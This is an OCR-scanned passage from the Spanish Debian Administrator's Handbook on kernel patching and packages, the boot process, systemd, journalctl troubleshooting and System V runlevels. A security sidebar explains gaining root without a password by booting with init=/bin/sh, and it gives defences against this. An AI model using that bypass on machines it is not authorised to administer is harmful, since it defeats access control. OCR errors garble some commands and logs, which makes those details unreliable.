Debian  distribuye  algunos  de  estos  parches  en  paquetes  linux-patch-*  o  kernel-patch-*  (por  ejem- 
plo,  linux-patch- grsecurity 2  que  ajusta  algunas  de  las  pohticas  de  seguridad  del  nucleo).  Estos  pa¬ 
quetes  instalan  archivos  en  el  directorio  /us  r/src/kernel-  patches/. 

Para  aplicar  uno  o  mas  de  estos  parches  instalados,  utilice  el  programa  patch  en  el  directorio 
con  las  fuentes  y  luego  inicie  la  compilacion  del  nucleo  como  ya  describimos. 

$  cd  ~/kernel/linux-source-3 . 16 
$  make  clean 

$  zcat  /usr/src/kernel-patches/diffs/grsecurity2/grsecurity-3.0-3 . 17 . 1-201410250027. 
patch. gz  |  patch  -pi 

Sepa  que  un  parche  dado  no  necesariamente  funcionara  con  toda  version  del  nucleo;  es  posible 
que  patch  falle  al  aplicarlo  en  las  fuentes  del  nucleo.  Se  mostrara  un  mensaje  de  error  que  provee 
algunos  detalles  del  fallo;  en  este  caso,  revise  la  documentacion  disponible  en  el  paquete  Debian 
del  parche  (en  el  directorio  /u sr/s ha re/doc/linux-  patch  -  */).  En  la  mayoria  de  los  casos,  el 
desarrollador  indica  para  que  versiones  del  nucleo  esta  creado  el  parche. 


8.11.  Instalacion  de  un  nucleo 

8.11.1.  Caracteristicas  de  un  paquete  Debian  del  nucleo 

Un  paquete  Debian  del  nucleo  instala  la  imagen  del  nucleo  (vmlinuz  -  version),  su  configuracion 
(con fig  -  version) y  su  tabla  de  sfmbolos  (System .  map  -  version)  en/boot/.  La  tabla  desimbolos 
ayuda  a  los  desarrolladores  a  entender  el  significado  de  un  mensaje  de  error  del  nucleo;  sin  ella, 
los  «oops»  del  nucleo  (un  «oops»  es  el  equivalente  del  nucleo  a  un  fallo  de  segmento  en  progra- 
mas  en  espacio  de  usuario,  en  otras  palabras,  los  mensajes  generados  luego  de  desreferenciar 
un  puntero  de  forma  invalida)  solo  contienen  direcciones  de  memoria  numericas,  que  es  infor- 
macion  inutil  sin  la  tabla  que  enlaza  estas  direcciones  con  sfmbolos  y  nombres  de  funcion.  Se 
instalan  los  modulos  en  el  directorio  /lib/modules /version/. 

Los  scripts  de  configuracion  del  paquete  generan  automaticamente  una  imagen  initrd,  que  es  un 
minisistema  disenado  para  ser  cargado  en  memoria  (de  allf  el  nombre,  que  significa  «disco  ram 
de  inicio»:  «init  ramdisk»)  por  el  gestor  de  arranque  y  utilizado  por  el  nucleo  Linux  solo  para  car- 
gar  los  modulos  necesarios  para  acceder  a  los  dispositivos  que  contienen  el  sistema  Debian  com- 
pleto  (por  ejemplo,  los  controladores  de  discos  SATA).  Linalmente,  los  scripts  postinstalacion 
actualizan  los  enlaces  simbolicos  /vmlinuz,  /vmlinux . old,  /init  rd .  img  y  /initrd  . img  . old 
para  que  apunten  a  los  dos  ultimos  nucleos  instalados,  respectivamente,  asf  como  tambien  a  las 
imagenes  initrd  correspondientes. 
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Se  encargan  la  mayorfa  de  estas  tareas  a  scripts  de  activacion  en  los  directories  /etc/ 
kernel/*. d/.  Por  ejemplo,  la  integracion  con  grub  esta  basada  en  /etc/kernel/postinst . 
d/zz-update-grub  y  /etc/kernel/postrm.d/zz-update-grub  para  ejecutar  update-grub 
cuando  se  instalan  o  eliminan  nucleos. 


8.11.2.  Instalacion  con  dpkg 

Utilizar  apt  es  tan  conveniente  que  hace  facil  olvidar  las  herramientas  de  bajo  nivel,  pero  la 
forma  mas  sencilla  de  instalar  un  nucleo  compilado  es  ejecutar  algo  como  dpkg  -i  paquete. 
deb,  donde  paquete.deb  es  el  nombre  de  un  paquete  linux-image  como  linux-image-3.16. 
7- ckt4- f alcot_l_amd64 . deb. 

Los  pasos  de  configuracion  descriptos  en  este  capitulos  son  basicos  y  sirven  tanto  para  un  servi- 
dor  como  para  una  estacion  de  trabajo  y  pueden  ser  duplicados  masivamente  de  formas  semiau- 
tomaticas.  Sin  embargo,  no  son  suficientes  por  si  mismas  para  proveer  un  sistema  completamen- 
te  configurado.  Todavia  necesita  algunas  piezas  de  configuracion,  comenzando  con  programas 
de  bajo  nivel  conocidas  como  «servicios  Unix». 
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Este  capitulo  cubre  un  numero  basico  de  servicios  que  son  comunes  a  varios  sistemas  Unix.  Todos  los 
administradores  deberian  estar  familiarizados  con  ellos. 


9.1.  Arranque  del  sistema 


Cuando  inicia  el  equipo,  los  muchos  mensajes  que  aparecen  en  la  pantalla  muestran  varias  inicia- 
lizaciones  y  configuraciones  automaticas  que  se  estan  ejecutando.  Algunas  veces  deseara  alterar 
ligeramente  como  funciona  esta  etapa,  lo  que  significa  que  necesitara  entenderlas  bien.  Este  es 
el  proposito  de  esta  seccion. 

Primero  el  BIOS  toma  el  control  del  equipo,  detecta  los  discos,  carga  el  registro  maestro  de  arran¬ 
que  («MBR»)  y  ejecuta  el  gestor  de  arranque.  Este  toma  el  control,  busca  el  nucleo  en  el  disco,  lo 
carga  y  lo  ejecuta.  Luego  se  inicializa  el  nucleo  y  empieza  la  busqueda  y  montaje  de  la  particion 
que  contiene  el  sistema  de  archivos  rafz  y  finalmente  ejecuta  el  primer  programa  —  init.  Fre- 
cuentemente  esta  «particion  rafz»  y  su  init  estan,  de  hecho,  ubicados  en  un  archivo  virtual  del 
sistema  que  solo  existe  en  RAM  (de  aqul  el  nombre  «initramfs»,  anteriormente  llamado  «initrd» 
por  «disco  RAM  de  inicializacion»:  « initialization  RAM  disk»).  El  gestor  de  arranque  carga  este 
sistema  de  archivos  en  memoria,  muchas  veces  desde  un  archivo  en  el  disco  duro  o  desde  la  red. 
Contiene  solo  lo  minimo  requerido  por  el  nucleo  para  cargar  el  «verdadero»  sistema  de  archivos 
rafz:  estos  pueden  ser  modulos  de  controladores  para  el  disco  duro  u  otros  dispositivos  sin  los 
cuales  el  sistema  no  puede  iniciar  o,  mas  frecuentemente,  scripts  de  inicializacion  y  modulos 
para  ensamblar  arreglos  RAID,  abrir  particiones  cifradas,  activar  volumenes  LVM,  etc.  Una  vez 
que  se  monta  la  particion  rafz,  el  initramfs  entrega  el  control  al  verdadero  init  y  la  maquina 
regresa  al  proceso  de  inicio  estandar. 


Figura  9.1  Secuencia  de  inicio  de  un  equipo  ejecutando  Linux  con  systemd 


194 


El  manual  del  Administrador  de  Debian 


9.1.1  El  sistema  de  inicio  systemd 

Actualmente  systemd  proporciona  el  «init  real»  y  esta  seccion  documenta  este  sistema  de  inicio. 


CULTURA  systemd  es  un  ’’sistema  de  inicio”  relativamente  reciente.  Aunque  ya  estaba  dispo- 
Antes  de  systemd  nible  parcialmente  en  Wheezy,  se  ha  convertido  en  el  sistema  de  arranque  estandar 
en  Debian  a  partir  de  Jessie.  Las  versiones  anteriores  utilizaban  de  forma  predeter- 
minada  el  sistema  de  inico  ’’System  V”  (del  paquete  sysv-rc),  un  sistema  mucho 
mas  tradicional.  Se  describira  el  sistema  de  inicio  System  V  mas  adelante. 


ALTERNATIVA  Este  libro  describe  el  sistema  de  inicio  utilizado  de  forma  predeterminada  en  De- 

Otros  sistemas  de  inicio  bian  Jess'e  (implementado  en  el  paquete  systemd ),  as!  como  el  estandar  anterior, 

sysvinit,  el  cual  se  deriva  y  hereda  de  los  sistemas  Unix  «System  V»;  existen  otros 
sistemas  de  inicio. 

file-rc  es  un  sistema  de  inicio  con  un  proceso  muy  simple.  Mantiene  el  principio 
de  niveles  de  ejecucion  pero  reemplaza  los  directories  y  enlaces  simbolicos  con  un 
archivo  de  configuracion  que  le  indica  a  init  los  procesos  a  iniciar  y  el  orden  en  el 
que  hacerlo. 

El  sistema  upstart  todavia  noha  sido  probado  perfectamente  en  Debian.  Esta  ba- 
sado  en  eventos:  los  scripts  de  inicio  no  se  ejecutan  en  un  orden  secuencial  sino 
en  respuesta  a  eventos  como  la  finalizacion  de  otro  script  del  que  depende.  Este 
sistema,  creado  por  Ubuntu,  esta  presente  en  Debian  Jessie  pero  no  es  el  predeter- 
minado;  solo  viene  como  reemplazo  para  sysvinit  y  una  de  las  tareas  ejecutadas  por 
upstart  es  ejecutar  los  scripts  escritos  para  sistemas  tradicionales,  especialmente 
aquellos  del  paquete  sysv-rc. 

Tambien  existen  otros  sistemas  y  otros  modos  de  operacion,  como  por  ejemplo  ru- 
nit  o  minit  pero  estos  son  bastante  especializados  y  estan  poco  difundidos. 


CASO  ESPEClFICO  En  algunas  situaciones,  se  puede  configurar  el  BIOS  para  que  no  ejecute  el  MBR 
Arranque  desde  la  red  s'no  <1ue  busque  su  equivalente  en  la  red,  haciendo  posible  construir  equipos  sin 
disco  duro  o  que  son  completamente  reinstalados  en  cada  arranque.  Esta  opcion 
no  esta  disponible  en  todo  el  hardware  y  generalmente  necesita  una  combinacion 
apropiada  de  BIOS  y  placa  de  red. 

El  arranque  desde  la  red  puede  utilizarse  para  ejecutar  debian -installer  o  FAI 
(revise  la  Seccion  4.1,  «Metodos  de  instalacion»  pagina  52). 


VOLVER  A  LOS  CIMIENTOS 

El  proceso,  una  instancia 
de  un  programa 


Un  proceso  es  la  representacion  en  memoria  de  un  programa  en  ejecucion.  Incluye 
toda  la  informacion  necesaria  para  la  ejecucion  apropiada  del  programa  (el  codigo 
en  si  pero  tambien  los  datos  que  tiene  en  memoria,  la  lista  de  archivos  que  ha 
abierto,  las  conexiones  de  red  que  ha  establecido,  etc.).  Un  unico  programa  puede 
ser  instanciado  en  varios  procesos  inclusive  bajo  el  mismo  ID  de  usuario. 
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SEGURIDAD 

Usar  una  consola  como 
init  para  obtener 
derechos  de  root 


Por  convencion  el  primer  proceso  que  se  iniciaesel  programa  init  (que  por  omision 
es  un  enlace  simboico  a  /lib/ systemd/ systemd).  Sin  embargo,  es  posible  proveer 
una  opcion  init  al  nucleo  indicando  un  programa  diferente. 

Cualquier  persona  con  acceso  al  equipo  puede  presionar  el  boton  Reset  y  asi  reini- 
ciarla.  Entonces  es  posible,  en  el  prompt  del  gestor  de  arranque,  pasar  la  opcion 
init=/bin/sh  al  nucleo  para  obtener  acceso  root  sin  conocer  la  contrasena  del 
administrador. 


Para  prevenirlo  puede  proteger  el  gestor  de  arranque  con  una  contrasena.  Tambien 
podria  pensar  en  proteger  el  acceso  al  BIOS  (casi  siempre  tiene  disponible  un  meca- 
nismo  de  proteccion  por  contrasena)  sin  el  cual  un  intruso  malicioso  podria  iniciar 
la  maquina  desde  un  medio  removible  que  contiene  su  propio  sistema  Linux,  el  cual 
podria  utilizar  para  tener  acceso  a  los  datos  del  disco  duro  del  equipo. 

Finalmente,  tenga  en  cuenta  que  la  mayoria  de  los  BIOS  implementan  una  contra¬ 
sena  generica.  Inicialmente  destinado  a  resolver  los  problemas  de  quienes  han  olvi- 
dado  su  contrasena,  estas  ahora  son  publicas  y  estan  disponibles  en  Internet  (puede 
comprobarlo  Vd.  mismo  buscando  «contrasenas  genericas  de  BIOS»  en  algun  mo¬ 
tor  de  busqueda).  Todas  estas  protecciones  impediran  el  acceso  no  autorizado  a  la 
maquina  sin  poder  evitarlo  por  completo.  No  existe  una  forma  segura  de  proteger 
un  equipo  si  el  atacante  puede  acceder  a  el  fisicamente;  podria  quitar  el  disco  duro 
para  conectarlo  a  un  equipo  bajo  su  control  de  cualquier  manera,  o  incluso  robar 
la  maquina  completa  o  borrar  la  memoria  del  BIOS  para  eliminar  la  contrasena... 


Systemd  ejecuta  varios  procesos  que  se  encargan  de  configurar  el  sistema:  teclado,  controlado- 
res,  sistemas  de  archivos,  redes,  servicios.  Hace  esto  a  la  vez  que  mantiene  una  vision  global 
del  sistema  como  un  todo  y  de  los  requerimientos  de  los  componentes.  Cada  componente  se 
describe  en  un  fichero  unidad  o  ’’unit  file”  (a  veces  mas  de  uno).  La  sintaxis  de  los  mismos  se 
deriva  de  la  de  los  muy  extendidos  archivos  ”.ini”.  Es  decir  que  utiliza  pares  clave  =  valor  agru- 
pados  entre  cabeceras  de  [ seccion ].  Los  archivos  unit  se  guardan  en  /lib/systemd/system/  y 
/etc/systemd/system/.  Aunque  hay  varios  tipos,  aqui  nos  vamos  a  concentrar  en  los  servicios 
(’’services”)  y  metas  (’’targets”). 

Un  archivo  de  servicio  (’’service  file”)  de  systemd  describe  un  proceso  gestionado  por  systemd. 
Contiene  mas  o  menos  la  misma  informacion  que  los  antiguos  scripts  de  inicio,  pero  expresada 
en  de  forma  declarativa  (y  mucho  mas  concisa).  Systemd  se  ocupa  de  la  mayoria  de  las  tareas 
repetitivas  (arrancar  y  parar  el  proceso,  comprobar  su  estado,  registrar  los  errores,  soltar  privi- 
legios,  etc)  y  el  archivo  de  servico  unicamente  tiene  que  proporcionar  los  parametros  especificos 
de  cada  servicio.  Por  ejemplo  aqui  se  muestra  el  fichero  de  servicio  para  SSH: 

[Unit] 

Description=OpenBSD  Secure  Shell  server 
After=network, target  auditd . service 
ConditionPathExists= ! /etc/ssh/sshd_not_to_be_run 

[Service] 

EnvironmentFile=-/etc/default/ssh 
ExecStart=/usr/sbin/sshd  -D  $SSHD  OPTS 
ExecReload=/ bin/ kill  -HUP  $MAINPID 
KillMode=process 
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Restart=on- failure 


[Install] 

WantedBy=multi- user . target 
Alias=sshd . service 

Como  se  puede  comprobar  no  hay  apenas  codigo,  unicamente  declaraciones.  Systemd  se  ocupa 
de  mostrar  los  informes  de  progreso,  de  controlar  los  procesos  e  incluso  de  reiniciarlos  cuando 
sea  necesario. 

Un  fichero  de  meta  (’’target  file”)  describe  un  estado  del  sistema  en  el  cual  se  sabe  que  esta 
operativo  un  conjunto  de  servicios.  Se  puede  hacer  una  analogia  los  antiguos  niveles  de  eje- 
cucion  ("runlevels”).  Una  de  las  metas  es  local-fs.target;  cuando  se  alcanza,  el  resto  del  siste¬ 
ma  puede  asumir  que  todos  los  sistemas  de  archivos  locales  estan  montados  y  son  accesibles. 
Otros  ejemplos  de  metas  pueden  ser  network-online.target  o  sound.target.  Las  dependencias  de 
una  meta  se  pueden  establecer  directamente  en  su  archivo  de  configuracion  o  ’’target  file”  (en 
la  lrnea  Requires=)  o  bien  utilizando  un  enlace  simbolico  a  un  archivo  de  servicio  (’’service  fi¬ 
le”)  en  el  directorio  /lib/systemd/system/ targetname. target.wants/.  Por  ejemplo  /et  c/systemd/ 
system/ printer. target .wants/ contiene  un  enlace  a /lib/ systemd/sy stem/ cups . service; 
systemd  se  asegurara  de  que  CUPS  este  en  ejecucion  para  poder  alcanzar  la  meta  printer.target. 

Puesto  que  los  archivos  de  unidad  son  declarativos  en  lugar  de  scripts  o  programas,  no  se  pueden 
ejecutar  directamente;  tienen  que  ser  interpretados  por  systemd.  Existen  varias  utilidades  que 
permiten  al  administrador  interactuar  con  systemd  y  controlar  el  estado  del  sistema  y  de  cada 
componente. 

La  primera  de  estas  utilidades  es  systemctl.  Cuando  se  ejecuta  sin  argumentos  lista  todos  los 
archivos  de  unidad  conocidos  por  systemd  (excepto  los  que  han  sido  deshabilitados),  asi  como 
su  estado.  systemctl  status  muestra  una  vision  mejor  de  los  servicios  y  sus  procesos  relacio- 
nados.  Sise  proporciona  el nombre  deunservico  (comop.ej.  systemctl  status  ntp .  service) 
muestra  aun  mas  detealles,  asi  como  las  ultimas  lineas  del  registro  relacionadas  con  el  servicio 
(mas  informacion  mas  adelante). 

Para  arrancar  un  servicio  manualmente basta  ejecutar  systemctl  sta  rt  nombredelservicio . 
service.  Como  se  puede  suponer,  para  parar  un  servicio  se  hace  con  systemctl  stop  nombre 
delservicio .  service;  otros  subcomandos  disponibles  son  reload  y  restart. 

Para  establecer  si  un  servicio  esta  activo  (es  decir,  si  se  debe  arrancar  automaticamente  al  ini- 
cio  o  no)  utilce  el  comando  systemctl  enable  nombredelservicio .  service  (o  disable),  is- 
enabled  permite  saber  si  esta  activo  o  no. 

Una  caracteristica  interesante  de  systemd  es  que  incluye  un  componente  de  registro  llamado 
j  ou  rnald.  Viene  como  complemento  a  los  sistemas  de  registro  tradicionales  como  syslogd,  pe- 
ro  ahade  caracteristicas  interesantes  como  un  enlace  formal  entre  un  servicio  y  los  mensajes 
que  genera,  asi  como  la  posibilidad  de  capturar  los  mensajes  de  error  generados  por  su  secuen- 
cia  de  inicializacion.  Los  mensajes  se  pueden  mostrar  con  la  ayuda  del  comando  journalctl. 
Sin  argumentos  simplemente  vuelca  todos  los  mensajes  que  han  ocurrido  desde  el  arranque  del 
sistema,  aunque  no  se  suele  utilizar  de  esa  forma.  Normalmente  se  utiliza  con  un  identificador 
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de  servicio: 


#  journalctl  -u  ssh. service 

--  Logs  begin  at  Tue  2015-03-31  10:08:49  CEST,  end  at  Tue  2015-03-31  17:06:02  CEST. 
-  - 

Mar  31  10:08:55  mirtuel  sshd[430]:  Server  listening  on  0.0. 0.0  port  22. 

Mar  31  10:08:55  mirtuel  sshd[430]:  Server  listening  on  ::  port  22. 

Mar  31  10:09:00  mirtuel  sshd[430]:  Received  SIGHUP;  restarting. 

Mar  31  10:09:00  mirtuel  sshd[430]:  Server  listening  on  0.0. 0.0  port  22. 

Mar  31  10:09:00  mirtuel  sshd[430]:  Server  listening  on  ::  port  22. 

Mar  31  10:09:32  mirtuel  sshd[1151] :  Accepted  password  for  roland  from  192.168.1.129 
port  53394  ssh2 

Mar  31  10:09:32  mirtuel  sshd[1151] :  pam  unix(sshd : session) :  session  opened  for  user 
roland  by  (uid=0) 


Otra  opcion  util  es  -  f,  que  hace  que  j  ou  rnalctl  siga  mostrando  los  nuevos  mensajes  a  medida 
que  se  van  emitiendo  (semejante  a  lo  que  ocurre  con  tail  -f  file). 

Si  un  servicio  parece  que  no  esta  funcionando  como  debiera,  el  primer  paso  para  resolver  el 
problema  es  comprobar  si  el  servicio  esta  ejecutandose  realmente  mediante  systemctl  status. 
Si  no  es  asi  y  los  mensajes  que  se  muestran  no  son  suficientes  para  diagnosticar  el  problema 
se  pueden  comprobar  los  registros  que  ha  recogido  journald  relacionados  con  es  servicio.  Por 
ejemplo,  suponiendo  que  el  servidor  SSH  no  funciona: 

#  systemctl  status  ssh. service 

•  ssh. service  -  OpenBSD  Secure  Shell  server 

Loaded:  loaded  (/lib/systemd/system/ssh . service;  enabled) 

Active:  failed  (Result:  start-limit)  since  Tue  2015-03-31  17:30:36  CEST;  Is  ago 
Process:  1023  ExecReload=/bin/kill  -HUP  $MAINPID  ( code=exited ,  status=0/SUCCESS) 
Process:  1188  ExecStart=/usr/sbin/sshd  -D  $SSHD  OPTS  ( code=exited ,  status=255) 

Main  PID:  1188  (code=exited ,  status=255) 


Mar  31  17:30:36  mirtuel  systemd[l] 
*+■  status=255/n/a 

Mar  31  17:30:36  mirtuel  systemd[l] 
Mar  31  17:30:36  mirtuel  systemd[l] 
refusing  to  start. 

Mar  31  17:30:36  mirtuel  systemd[l] 
Mar  31  17:30:36  mirtuel  systemd[l] 
#  journalctl  -u  ssh. service 


ssh. service:  main  process  exited,  code=exited, 

Unit  ssh. service  entered  failed  state. 

ssh. service  start  request  repeated  too  quickly, 

Failed  to  start  OpenBSD  Secure  Shell  server. 
Unit  ssh. service  entered  failed  state. 


Logs  begin  at  Tue  2015-03-31  17:29:27  CEST,  end  at  Tue  2015-03-31  17:30:36  CEST. 


Mar  31  17:29:27  mirtuel 
Mar  31  17:29:27  mirtuel 
Mar  31  17:29:29  mirtuel 
Mar  31  17:29:29  mirtuel 
Mar  31  17:29:29  mirtuel 
Mar  31  17:30:10  mirtuel 


sshd [424]  : 
sshd [424]  : 
sshd [424]  : 
sshd [424]  : 
sshd [424]  : 
sshd [1147] 


port  38742  ssh2 


Server  listening  on  0.0. 0.0  port  22. 

Server  listening  on  ::  port  22. 

Received  SIGHUP;  restarting. 

Server  listening  on  0.0. 0.0  port  22. 

Server  listening  on  ::  port  22. 

Accepted  password  for  roland  from  192.168.1.129 


198 


El  manual  del  Administrador  de  Debian 


Mar  31  17:30:10  mirtuel  s s hd [ 1 147 ] :  pam_unix( sshd : session) :  session  opened  for  user 
roland  by  (uid=0) 

Mar  31  17:30:35  mirtuel  s s hd [ 1180 ] :  /etc/ssh/sshd  config  line  28:  unsupported  option 
"yess". 

Mar  31  17:30:35  mirtuel  systemd[l]:  ssh. service:  main  process  exited,  code=exited, 

*+■  status=255/n/a 

Mar  31  17:30:35  mirtuel  systemd[l]:  Unit  ssh. service  entered  failed  state. 

Mar  31  17:30:35  mirtuel  s s hd [ 1182 ] :  /etc/ssh/sshd  config  line  28:  unsupported  option 
"yess". 

Mar  31  17:30:35  mirtuel  systemd[l]:  ssh. service:  main  process  exited,  code=exited, 
status=255/n/a 

Mar  31  17:30:35  mirtuel  systemd[l]:  Unit  ssh. service  entered  failed  state. 

Mar  31  17:30:35  mirtuel  sshd[1184]:  /etc/ssh/sshd  config  line  28:  unsupported  option 
"yess". 

Mar  31  17:30:35  mirtuel  systemd[l]:  ssh. service:  main  process  exited,  code=exited, 

*+■  status=255/n/a 

Mar  31  17:30:35  mirtuel  systemd[l]:  Unit  ssh. service  entered  failed  state. 

Mar  31  17:30:36  mirtuel  s s hd [ 1186 ] :  /etc/ssh/sshd  config  line  28:  unsupported  option 
"yess". 

Mar  31  17:30:36  mirtuel  systemd[l]:  ssh. service:  main  process  exited,  code=exited, 
status=255/n/a 

Mar  31  17:30:36  mirtuel  systemd[l]:  Unit  ssh. service  entered  failed  state. 

Mar  31  17:30:36  mirtuel  sshd[1188]:  /etc/ssh/sshd  config  line  28:  unsupported  option 
*+■  "yess". 

Mar  31  17:30:36  mirtuel  systemd[l]:  ssh. service:  main  process  exited,  code=exited, 
status=255/n/a 

Mar  31  17:30:36  mirtuel  systemd[l]:  Unit  ssh. service  entered  failed  state. 

Mar  31  17:30:36  mirtuel  systemd[l]:  ssh. service  start  request  repeated  too  quickly, 
refusing  to  start. 

Mar  31  17:30:36  mirtuel  systemd[l]:  Failed  to  start  OpenBSD  Secure  Shell  server. 

Mar  31  17:30:36  mirtuel  systemd[l]:  Unit  ssh. service  entered  failed  state. 

#  vi  /etc/ssh/sshd_config 

#  systemctl  start  ssh. service 

#  systemctl  status  ssh. service 

#  ssh. service  -  OpenBSD  Secure  Shell  server 

Loaded:  loaded  (/lib/systemd/system/ssh . service;  enabled) 

Active:  active  (running)  since  Tue  2015-03-31  17:31:09  CEST;  2s  ago 
Process:  1023  ExecReload=/bin/kill  -HUP  $MAINPID  ( code=exited ,  status=0/SUCCESS) 
Main  PID:  1222  (sshd) 

CGroup:  /system. slice/ssh .service 
I— 1222  /us r/sbin/sshd  -D 

# 

Despues  de  comprobar  el  estado  del  servicio  (fallido)  comprobamos  los  registros;  indican  un 
error  en  el  archivo  de  configuracion.  Despues  de  editar  el  archivo  de  configuracion  y  corregir  el 
error  reiniciamos  el  servicio  y  comprobamos  que  efectivamente  esta  funcionando. 
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YENDOMAsallA  Solo  hemos  descrito  las  funciones  mas  basicas  de  systemd  en  esta  seccion,  pero 

Otros  tipos  de  archivos  ofrece  otras  muchas  caracterfsticas  interesantes;  a  continuacion  mecionamos  algu- 

de  unidades  nas: 

■  activacion  de  zocalos  ("sockets”):  se  puede  usar  un  archivo  de  unidad  de 
zocalo  ("socket  unit  file”)  para  describir  un  zocalo  de  red  o  Unix  gestionado 
por  systemd.  Esto  significa  que  systemd  creara  este  zocalo  y  que  se  ejecutara 
el  servicio  correspondiente  cuando  exista  un  intento  de  conexion  al  mismo. 
Con  esto  se  duplica  aproximadamente  la  funcionalidad  de  inetd.  Ver  syst 
emd . socket (5 ) . 

■  temporizadores:  un  archivo  de  unidad  de  temporizador  ("timer  unit  file”) 
describe  eventos  que  se  ejecutan  periodicamente  o  en  determinados  instan- 
tes.  Cuando  un  servicio  esta  enlazado  con  un  temporizador  la  tarea  corres¬ 
pondiente  se  ejecuta  cada  vez  que  se  dispare  el  temporizador.  Eso  permite 
replicar  parte  de  la  funcionalidad  de  cron.  Ver  systemd  .  timer(5) . 

■  red:  un  archivo  de  unidad  de  red  ("network  unit  file”)  describe  una  interfaz 
de  red  y  permite  su  configurarla,  asi  como  expresar  que  un  servicio  depende 
de  que  una  interfaz  de  red  determinada  este  levantada. 


9.1.2  El  sistema  de  inicio  System  V 

El  sistema  de  incio  System  V  (al  cual  llamaremos  init  por  brevedad)  ejecuta  varios  procesos 
siguiendo  instrucciones  del  archivo  /etc/inittab.  El  primer  programa  que  ejecuta  (que  se  co- 
rresponde  con  el  paso  sysinit )  es  /etc/init .  d/  rcS,  un  script  que  ejecuta  todos  los  programas 
del  directorio  /etc/  rcS .  d/. 

Entre  estos  encontrara  sucesivamente  programas  a  cargo  de: 

■  configurar  el  teclado  de  la  consola; 

■  cargar  controladores:  el  nucleo  carga  por  si  mismo  la  mayoria  de  los  modulos  a  medida  que 
el  hardware  es  detectado;  los  controladores  extras  se  cargan  automaticamente  cuando  los 
modulos  correspondientes  son  listados  en  /etc/modules; 

■  verificar  la  integridad  de  los  sistemas  de  archivos; 

■  montar  particiones  locales; 

■  configurar  la  red; 

■  montar  sistemas  de  archivos  de  red  (NFS). 


VOLVER  A  LOS  CIMIENTOS  Los  modulos  del  nucleo  tambien  tienen  opciones  que  puede  configurar  agregando 
Modulos  y  opciones  del  algunos  archivos  en  /etc/modprobe . d/.  Estas  opciones  se  definen  con  directivas 
nucleo  como:  options  nombre-del-modulo  nombre-opci6n=valor-opcion.  Puede  es- 
pecficar  varias  opciones  con  una  sola  directiva  si  es  necesario. 

Estos  archivos  de  configuracion  estan  destinados  a  modprobe  —  el  programa  que 
carga  un  modulo  de  nucleo  con  sus  dependencias  (los  modulos  tambien  pueden 
llamar  otros  modulos).  El  paquete  kmod  provee  este  programa. 
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Despues  de  esta  etapa,  init  toma  el  control  e  inicia  los  programas  activados  en  el  nivel  de  eje¬ 
cucion  («runlevel»)  predeterminado  (generalmente  el  nivel  2).  Ejecuta  /etc/init .  d/  rc  2,  un 
script  que  inicia  todos  los  servicios  enumerados  en  /etc/rc2  .d/  y  aquellos  cuyos  nombres  co- 
miencen  con  la  letra  «S».  Los  numeros  de  dos  cifras  que  le  sigue  fueron  utilizados  historica- 
mente  para  definir  el  orden  en  el  que  se  iniciaran  los  servicios,  pero  actualmente  el  sistema  de 
inicio  predeterminado  utiliza  insserv,  que  programa  todo  automaticamente  basandose  en  las 
dependencias  de  los  scripts.  Cada  script  de  inicio,  por  lo  tanto,  declara  las  condiciones  a  cumplir 
para  iniciar  o  detener  el  servicio  (por  ejemplo,  si  debe  iniciar  antes  o  despues  de  otro  servicio); 
init  luego  los  ejecuta  en  un  orden  que  satisfaga  estas  condiciones.  El  enumerado  estatico  de  los 
scripts  ya  no  se  tiene  en  cuenta  (pero  sus  nombres  siempre  deben  comenzar  con  «S»  seguidos  de 
dos  numeros  y  el  nombre  real  del  script  utilizado  para  dependencias).  Generalmente,  se  inician 
primero  los  servicios  de  base  (como  los  registros  con  rsyslogd  o  la  asociacion  de  puertos  con 
portmap)  seguidos  de  los  servicios  estandar  y  la  interfaz  grafica  (gdm). 

Este  sistema  de  inicio  basado  en  dependencias  hace  posible  renumerar  automaticamente  los 
scripts,  lo  que  seria  tediososo  de  hacer  manualmente  y  limita  el  riesgo  de  error  humano  ya  que 
se  realiza  la  programacion  segun  los  parametros  indicados.  Otro  beneficio  es  que  se  pueden 
iniciar  los  servicios  en  paralelo  cuando  son  independientes  entre  ellos,  lo  cual  puede  acelerar  el 
proceso  de  inicio. 

init  distingue  varios  niveles  de  ejecucion  («runlevel»)  y  puede  cambiar  de  uno  a  otro  ejecutan- 
do  telinit  nuevo-nivel.  Inmediatamente,  init  ejecuta  nuevamente  /etc/init .  d/  rc  con  el 
nuevo  nivel  de  ejecucion.  Luego,  este  script  ejecutara  los  servicios  faltantes  y  detendra  aque¬ 
llos  que  ya  no  se  desean.  Para  hacerlo,  se  refiere  al  contenido  del  archivo  /etc/rcx.d  (donde 
X  representa  el  nuevo  nivel  de  ejecucion).  Los  scripts  cuyos  nombres  comienzan  con  «S»  (por 
«start»,  iniciar)  son  los  servicios  a  iniciar;  aquellos  cuyos  nombres  comienzan  con  «K»  (por  «kill», 
matar)  son  los  servicios  a  detener.  El  script  no  inicia  ningun  servicio  que  ya  haya  estado  activo 
en  el  nivel  de  ejecucion  anterior. 

De  forma  predeterminada,  el  inicio  System  V  en  Debian  utiliza  cuatro  niveles  de  ejecucion  dife- 
rentes: 

■  Nivel  0:  solo  se  lo  utiliza  temporalmente  mientras  se  apaga  el  equipo.  Como  tal,  solo  con- 
tiene  scripts  «K». 

■  Nivel  1:  tambien  conocido  como  modo  de  usuario  unico,  corresponde  al  sistema  en  modo 
degradado;  solo  incluye  servicios  basicos  y  esta  destinado  a  operaciones  de  mantenimien- 
to  donde  no  se  desea  la  interaccion  con  usuarios  normales. 

■  Nivel  2:  es  el  nivel  para  operaciones  normales,  lo  que  incluye  servicios  de  red,  una  interfaz 
grafica,  sesiones  de  usuario,  etc. 

■  Nivel  6:  similar  a  nivel  0,  excepto  a  que  es  utilizada  durante  la  fase  de  cierre  que  precede 
a  un  reinicio. 

Existe  otros  niveles,  especialmente  del  3  al  5.  De  forma  predeterminara  estan  configurados  para 
operar  de  la  misma  forma  que  el  nivel  2,  pero  el  administrador  puede  modificarlos  (agregando 
o  eliminando  scripts  en  los  directories  /etc/  rcX.  d  correspondientes)  para  adaptarlos  a  necesi- 
dades  particulares. 
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Cada  flecha  significa  «ejecuta» 


Figura  9.2  Secuencia  de  inicio  de  un  equipo  ejecutando  Linux  con  inicio  System  V 


Todos  los  scripts  en  los  varios  directories  /etc/rcX.d  son  solo  enlaces  simbolicos  —  creados 
durante  la  instalacion  del  paquete  por  el  programa  update  - rc.d  —  que  apuntan  a  los  scripts 
reales  que  estan  almacenados  en  /etc/init  .d/.  El  administrador  puede  ajustar  los  servicios 
disponibles  en  cada  nivel  de  ejecucion  ejecutando  update- rc.d  nuevamente  con  los  parame- 
